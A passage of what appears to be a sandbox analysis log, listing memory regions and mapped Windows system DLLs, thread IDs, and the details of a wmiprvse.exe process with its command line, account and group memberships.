"\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 3016 start_va = 0x7ff855b80000 end_va = 0x7ff855c11fff monitored = 0 entry_point = 0x7ff855bca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3017 start_va = 0x7ff855ca0000 end_va = 0x7ff855d0dfff monitored = 0 entry_point = 0x7ff855ca7f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 3018 start_va = 0x7ff855d10000 end_va = 0x7ff855d20fff monitored = 0 entry_point = 0x7ff855d13320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 3019 start_va = 0x7ff855d50000 end_va = 0x7ff855d5ffff monitored = 0 entry_point = 0x7ff855d52c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 3020 start_va = 0x7ff855d60000 end_va = 0x7ff855da0fff monitored = 0 entry_point = 0x7ff855d77eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 3021 start_va = 0x7ff855db0000 end_va = 0x7ff855eabfff monitored = 0 entry_point = 0x7ff855de6df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 3022 start_va = 0x7ff855fc0000 end_va = 0x7ff855fe8fff monitored = 0 entry_point = 0x7ff855fcca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3023 start_va = 0x7ff855ff0000 end_va = 0x7ff856025fff monitored = 0 entry_point = 0x7ff856000070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3024 start_va = 0x7ff856880000 end_va = 0x7ff856889fff monitored = 0 entry_point = 0x7ff856881660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3025 start_va = 0x7ff856890000 end_va = 0x7ff8568a7fff monitored = 0 entry_point = 0x7ff856895910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3026 start_va = 0x7ff8568b0000 end_va = 0x7ff8569fcfff monitored = 0 entry_point = 0x7ff8568f3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 3027 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3028 start_va = 0x7ff857260000 end_va = 0x7ff8572c6fff monitored = 0 entry_point = 0x7ff85727e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 3029 start_va = 0x7ff8576d0000 end_va = 0x7ff85778dfff monitored = 0 entry_point = 0x7ff857712d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 3030 start_va = 0x7ff857b80000 end_va = 0x7ff857b87fff monitored = 0 entry_point = 0x7ff857b813e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 3031 start_va = 0x7ff857b90000 end_va = 0x7ff857c08fff monitored = 0 entry_point = 0x7ff857bafb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3032 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3033 start_va = 0x7ff857da0000 end_va = 0x7ff857dbbfff monitored = 0 entry_point = 0x7ff857da37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3034 start_va = 0x7ff857dc0000 end_va = 0x7ff857df1fff monitored = 0 entry_point = 0x7ff857dcb0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 3035 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3036 start_va = 0x7ff857ee0000 end_va = 0x7ff857efcfff monitored = 0 entry_point = 0x7ff857ee4f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 3037 start_va = 0x7ff857fa0000 end_va = 0x7ff857fdffff monitored = 0 entry_point = 0x7ff857fb1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 3038 start_va = 0x7ff858070000 end_va = 0x7ff858105fff monitored = 0 entry_point = 0x7ff858095570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3039 start_va = 0x7ff858130000 end_va = 0x7ff858156fff monitored = 0 entry_point = 0x7ff858137940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3040 start_va = 0x7ff858160000 end_va = 0x7ff858209fff monitored = 0 entry_point = 0x7ff858187910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3041 start_va = 0x7ff8583a0000 end_va = 0x7ff8583abfff monitored = 0 entry_point = 0x7ff8583a2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 3042 start_va = 0x7ff858570000 end_va = 0x7ff8585a1fff monitored = 0 entry_point = 0x7ff858582340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 3043 start_va = 0x7ff8586e0000 end_va = 0x7ff8586ebfff monitored = 0 entry_point = 0x7ff8586e2790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 3044 start_va = 0x7ff8586f0000 end_va = 0x7ff858713fff monitored = 0 entry_point = 0x7ff8586f3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3045 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3046 start_va = 0x7ff858990000 end_va = 0x7ff8589d8fff monitored = 0 entry_point = 0x7ff85899a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 3047 start_va = 0x7ff858b00000 end_va = 0x7ff858b0bfff monitored = 0 entry_point = 0x7ff858b027e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3048 start_va = 0x7ff858b40000 end_va = 0x7ff858b4cfff monitored = 0 entry_point = 0x7ff858b41fe0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 3049 start_va = 0x7ff858be0000 end_va = 0x7ff858c10fff monitored = 0 entry_point = 0x7ff858be7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3050 start_va = 0x7ff858c40000 end_va = 0x7ff858cb9fff monitored = 0 entry_point = 0x7ff858c61a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3051 start_va = 0x7ff858d00000 end_va = 0x7ff858d33fff monitored = 0 entry_point = 0x7ff858d1ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3052 start_va = 0x7ff858d40000 end_va = 0x7ff858d49fff monitored = 0 entry_point = 0x7ff858d41830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3053 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3054 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3055 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3056 start_va = 0x7ff8590d0000 end_va = 0x7ff8590e6fff monitored = 0 entry_point = 0x7ff8590d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3057 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3058 start_va = 0x7ff859230000 end_va = 0x7ff859250fff monitored = 0 entry_point = 0x7ff859240250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 3059 start_va = 0x7ff859280000 end_va = 0x7ff8592b9fff monitored = 0 entry_point = 0x7ff859288d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 3060 start_va = 0x7ff8592c0000 end_va = 0x7ff8592e6fff monitored = 0 entry_point = 0x7ff8592d0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 3061 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3062 start_va = 0x7ff859560000 end_va = 0x7ff859578fff monitored = 0 entry_point = 0x7ff859565e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 3063 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3064 start_va = 0x7ff8595b0000 end_va = 0x7ff859648fff monitored = 0 entry_point = 0x7ff8595df4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3065 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3066 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3067 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3068 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3069 start_va = 0x7ff859830000 end_va = 0x7ff859846fff monitored = 0 entry_point = 0x7ff859831390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3070 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3071 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3072 start_va = 0x7ff859c10000 end_va = 0x7ff859c64fff monitored = 0 entry_point = 0x7ff859c27970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3073 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3074 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3075 start_va = 0x7ff85a330000 end_va = 0x7ff85a3b5fff monitored = 0 entry_point = 0x7ff85a33d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3076 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3077 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3078 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3079 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3080 start_va = 0x7ff85a540000 end_va = 0x7ff85a59bfff monitored = 0 entry_point = 0x7ff85a55b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3081 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3082 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3083 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3084 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3085 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3086 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3087 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3088 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3089 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3090 start_va = 0x7ff85c6f0000 end_va = 0x7ff85cb18fff monitored = 0 entry_point = 0x7ff85c718740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3091 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3092 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3093 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3094 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3095 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3113 start_va = 0x9a20000 end_va = 0x9b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 3114 start_va = 0xac00000 end_va = 0xacfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ac00000" filename = "" Region: id = 3120 start_va = 0xad00000 end_va = 0xadfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad00000" filename = "" Region: id = 3146 start_va = 0xae00000 end_va = 0xaefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae00000" filename = "" Region: id = 3148 start_va = 0xaf00000 end_va = 0xaffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af00000" filename = "" Region: id = 3149 start_va = 0xb000000 end_va = 0xb0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b000000" filename = "" Region: id = 3150 start_va = 0xb100000 end_va = 0xb1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b100000" filename = "" Thread: id = 91 os_tid = 0x1e0 Thread: id = 92 os_tid = 0x178 Thread: id = 93 os_tid = 0xd1c Thread: id = 94 os_tid = 0x588 Thread: id = 95 os_tid = 0xa74 Thread: id = 96 os_tid = 0x954 Thread: id = 97 os_tid = 0xc34 Thread: id = 98 os_tid = 0xc28 Thread: id = 99 os_tid = 0xb14 Thread: id = 100 os_tid = 0xb18 Thread: id = 101 os_tid = 0xffc Thread: id = 102 os_tid = 0xff8 Thread: id = 103 os_tid = 0xff4 Thread: id = 104 os_tid = 0xff0 Thread: id = 105 os_tid = 0xfec Thread: id = 106 os_tid = 0xfe8 Thread: id = 107 os_tid = 0xfe4 Thread: id = 108 os_tid = 0xbdc Thread: id = 109 os_tid = 0xadc Thread: id = 110 os_tid = 0x8b0 Thread: id = 111 os_tid = 0x894 Thread: id = 112 os_tid = 0x890 Thread: id = 113 os_tid = 0x860 Thread: id = 114 os_tid = 0x84c Thread: id = 115 os_tid = 0x850 Thread: id = 116 os_tid = 0x834 Thread: id = 117 os_tid = 0x7ec Thread: id = 118 os_tid = 0x7f4 Thread: id = 119 os_tid = 0x7e4 Thread: id = 120 os_tid = 0x7b4 Thread: id = 121 os_tid = 0x7b0 Thread: id = 122 os_tid = 0x7a8 Thread: id = 123 os_tid = 0x7a4 Thread: id = 124 os_tid = 0x7a0 Thread: id = 125 os_tid = 0x79c Thread: id = 126 os_tid = 0x798 Thread: id = 127 os_tid = 0x78c Thread: id = 128 os_tid = 0x788 Thread: id = 129 os_tid = 0x780 Thread: id = 130 os_tid = 0x770 Thread: id = 131 os_tid = 0x768 Thread: id = 132 os_tid = 0x75c Thread: id = 133 os_tid = 0x718 Thread: id = 134 os_tid = 0x70c Thread: id = 135 os_tid = 0x708 Thread: id = 136 os_tid = 0x6f8 Thread: id = 137 os_tid = 0x6f0 Thread: id = 138 os_tid = 0x6e8 Thread: id = 139 os_tid = 0x6dc Thread: id = 140 os_tid = 0x6d8 Thread: id = 141 os_tid = 0x6d4 Thread: id = 142 os_tid = 0x6cc Thread: id = 143 os_tid = 0x6c8 Thread: id = 144 os_tid = 0x6c4 Thread: id = 145 os_tid = 0x6b8 Thread: id = 146 os_tid = 0x6b4 Thread: id = 147 os_tid = 0x6b0 Thread: id = 148 os_tid = 0x688 Thread: id = 149 os_tid = 0x46c Thread: id = 150 os_tid = 0x638 Thread: id = 151 os_tid = 0x5f8 Thread: id = 152 os_tid = 0x5d8 Thread: id = 153 os_tid = 0x4a8 Thread: id = 154 os_tid = 0x4a4 Thread: id = 155 os_tid = 0x444 Thread: id = 156 os_tid = 0x434 Thread: id = 157 os_tid = 0x2c8 Thread: id = 158 os_tid = 0x2ac Thread: id = 159 os_tid = 0x268 Thread: id = 160 os_tid = 0x188 Thread: id = 161 os_tid = 0x184 Thread: id = 162 os_tid = 0x180 Thread: id = 163 os_tid = 0x154 Thread: id = 164 os_tid = 0x148 Thread: id = 165 os_tid = 0x144 Thread: id = 166 os_tid = 0x13c Thread: id = 167 os_tid = 0x120 Thread: id = 168 os_tid = 0x11c Thread: id = 169 os_tid = 0x60 Thread: id = 170 os_tid = 0x3ec Thread: id = 171 os_tid = 0x3e4 Thread: id = 172 os_tid = 0x374 Thread: id = 173 os_tid = 0x368 Thread: id = 187 os_tid = 0x464 Thread: id = 188 os_tid = 0xda0 Thread: id = 189 os_tid = 0xcd8 Thread: id = 190 os_tid = 0xd9c Thread: id = 191 os_tid = 0x4d0 Thread: id = 192 os_tid = 0x544 Thread: id = 193 os_tid = 0x5e8 Process: id = "23" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x14c54000" os_pid = "0xb58" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "22" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00028cc1" [0xc000000f] Region: id = 3153 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3154 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3155 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3156 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3157 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3158 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3159 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3160 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3161 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3162 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3163 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3164 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3165 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3166 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3167 start_va = 0x410000 end_va = 0x414fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3168 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3169 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3170 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3171 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 